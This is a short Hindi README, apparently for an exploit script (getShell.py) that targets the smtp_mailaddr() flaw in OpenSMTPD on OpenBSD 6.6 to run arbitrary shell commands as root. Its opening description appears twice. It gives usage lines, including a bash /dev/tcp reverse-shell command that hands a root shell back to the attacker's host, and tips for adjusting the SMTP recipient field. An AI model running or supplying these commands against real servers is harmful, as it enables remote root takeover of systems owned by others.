
यह भेद्यता OpenBSD के मेल सर्वर OpenSMTPD के "smtp_mailaddr()" फ़ंक्शन में मौजूद है, और OpenBSD संस्करण 6.6 को प्रभावित करती है। यह एक हमलावर को रूट उपयोगकर्ता के रूप में "sleep 66" जैसे मनमाने शेल कमांड निष्पादित करने की अनुमति देती है।
यह भेद्यता OpenBSD के मेल सर्वर OpenSMTPD के "smtp_mailaddr()" फ़ंक्शन में मौजूद है, और OpenBSD संस्करण 6.6 को प्रभावित करती है। यह एक हमलावर को रूट उपयोगकर्ता के रूप में "sleep 66" जैसे मनमाने शेल कमांड निष्पादित करने की अनुमति देता है।
python3 getShell.py <targetIp> <targetPort> <command>
यदि आपको रिवर्स शेल चाहिए तो इसे इस तरह चलाएँ
python3 getShell.py <TargetIp> <TargetPort> 'bash -c "exec bash -i &> /dev/tcp/IP/PORT <&1"'
इस एक्सप्लॉइट में कुछ चीज़ें बदलें जैसे RCPT to और अन्य (यदि आवश्यक हो)
अधिक स्पष्ट व्याख्या के लिए यह लेख देखें
https://blog.firosolutions.com/exploits/opensmtpd-remote-vulnerability/